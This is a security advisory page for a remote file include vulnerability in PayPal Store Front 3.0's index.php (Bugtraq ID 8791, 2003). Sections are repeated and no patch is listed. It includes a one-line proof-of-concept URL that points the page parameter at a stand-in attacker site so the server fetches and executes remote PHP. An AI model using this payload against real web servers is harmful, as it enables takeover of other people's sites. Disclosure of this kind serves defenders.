PayPal Store Front 'index.php' Remote File Include Vulnerability
BID:8791
Info
PayPal Store Front 'index.php' Remote File Include Vulnerability
| Bugtraq ID: | 8791 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 08 2003 12:00AM |
| Updated: | Oct 08 2003 12:00AM |
| Credit: | The disclosure of this issue has been credited to Zone-H <http://www.zone-h.org>. |
| Vulnerable: |
PayPal Store Front PayPal Store Front 3.0 |
| Not Vulnerable: | |
Discussion
PayPal Store Front 'index.php' Remote File Include Vulnerability
PayPal Store Front is prone to a remote file include vulnerability. It may be possible for a remote attacker to influence the include path for an external page to point to an attacker-specified location. This could be exploited to include a remote PHP script, which will be executed in the context of the web server hosting the vulnerable PayPal Store Front software.
PayPal Store Front 3.0 has been reported to be vulnerable to this issue, however it is possible that other versions are affected as well.
PayPal Store Front is prone to a remote file include vulnerability. It may be possible for a remote attacker to influence the include path for an external page to point to an attacker-specified location. This could be exploited to include a remote PHP script, which will be executed in the context of the web server hosting the vulnerable PayPal Store Front software.
PayPal Store Front 3.0 has been reported to be vulnerable to this issue, however it is possible that other versions are affected as well.
Exploit / POC
PayPal Store Front 'index.php' Remote File Include Vulnerability
The following proof of concept has been provided:
http://www.example.com/index.php?do=ext&page=http://www.attacker's_site.com/index
The following proof of concept has been provided:
http://www.example.com/index.php?do=ext&page=http://www.attacker's_site.com/index
Solution / Fix
PayPal Store Front 'index.php' Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PayPal Store Front 'index.php' Remote File Include Vulnerability
References:
References:
- PayPal Store Front (TAZ)
- PayPal Store Front (Astharot
)